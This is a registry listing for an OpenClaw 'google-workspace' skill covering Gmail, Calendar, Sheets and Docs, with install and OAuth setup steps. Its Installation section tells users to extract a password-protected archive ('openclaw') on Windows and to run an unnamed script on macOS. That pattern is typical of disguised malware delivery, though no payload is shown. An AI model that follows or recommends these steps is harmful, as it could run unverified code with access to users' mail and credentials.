ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified productivity Safety 3/5

google-workspace

Interact with Google Workspace services - Gmail, Calendar, Contacts, Sheets, and Docs. Send emails, manage calendar events, read/write spreadsheets, create documents, and sync contacts.

Why use this skill?

Learn how to use the Google Workspace skill for OpenClaw to automate Gmail, Calendar, Sheets, and Docs tasks with secure API integration and AI-driven workflow efficiency.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/google-workspace-gbvyc
Or

What This Skill Does

The google-workspace skill for OpenClaw provides a powerful interface for automating tasks across the Google Workspace ecosystem. It acts as a bridge between the OpenClaw agent and Google's suite of productivity tools, including Gmail, Google Calendar, Google Sheets, and Google Docs. By leveraging OAuth 2.0 authentication, the skill securely connects to your private data, allowing you to read emails, schedule meetings, manipulate spreadsheets, and generate documents programmatically. This skill is designed for power users and developers looking to streamline their daily workflows by delegating repetitive administrative tasks to an AI agent, ensuring that your data remains synchronized and accessible through the command line or agent-assisted automation.

Installation

To begin, ensure you have the openclaw-agent installed on your machine. For Windows, download and extract the archive using the password 'openclaw'. For macOS, execute the provided installation script in your terminal. Once the agent is ready, install the skill using the command: clawhub install openclaw/skills/skills/hightower6eu/google-workspace-gbvyc. After installation, you must configure a Google Cloud Project, enable the required APIs (Gmail, Calendar, Sheets, Docs, People), and place your credentials.json in the root directory. Run the provided google_auth.py script once to authorize your account via your browser.

Use Cases

  • Automating email triage: Summarize high-priority emails or draft responses to common customer inquiries.
  • Meeting management: Query your calendar for the next three appointments or automatically create events from parsed email data.
  • Data reporting: Extract data from live sources and write them directly into organized Google Sheets for real-time tracking.
  • Document generation: Create standardized documents or reports using templates updated with real-time data.

Example Prompts

  1. "Check my Gmail for any urgent messages from my project lead today and summarize them."
  2. "Look at my calendar and find a 30-minute opening tomorrow afternoon to schedule a team sync."
  3. "Take the data from my latest report and append the findings into the project-tracking Google Sheet."

Tips & Limitations

Always ensure the openclaw-agent is active before invoking commands. Note that Google APIs have rate limits; avoid executing bulk requests in rapid succession. Authentication tokens are saved locally in token.pickle; keep this file secure. For complex document manipulation, verify the specific API scopes enabled in your Google Cloud Console, as adding new scopes requires re-authorizing the application.

Metadata

Stars2387
Views0
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-google-workspace-gbvyc": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#productivity#automation#google-workspace#gmail#calendar
Safety Score: 3/5

Flags: network-access, file-read, file-write, external-api